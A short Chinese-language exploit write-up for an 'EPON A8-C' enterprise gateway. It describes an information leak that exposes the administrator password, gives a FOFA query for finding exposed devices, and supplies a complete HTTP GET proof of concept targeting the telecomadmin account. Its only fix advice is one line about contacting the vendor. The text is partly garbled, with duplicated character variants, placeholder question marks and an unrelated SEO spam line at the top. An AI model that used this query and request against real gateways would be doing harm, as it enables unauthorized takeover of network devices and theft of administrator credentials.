新手學(xué)做網(wǎng)站 cs6seo服務(wù)顧問
Nx01 產(chǎn)品簡介
????????EPON上行A8-C政企網(wǎng)關(guān)是一款終端產(chǎn)品,提供企業(yè)網(wǎng)絡(luò)解決方案。
Nx02 漏洞描述
????????EPON上行A8-C政企網(wǎng)關(guān)敏感信息泄露漏洞,攻擊者通過敏感信息泄露獲取管理員密碼。
Nx03 產(chǎn)品主頁
fofa-query: "ZXECS" && title=="Web user login"
Nx04 漏洞復(fù)現(xiàn)
POC:
GET /user/local_user_mod.php?index_name=telecomadmin HTTP/1.1
Host: {{Hostname}}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Nx05 修復(fù)建議
建議聯(lián)系軟件廠商進(jìn)行處理。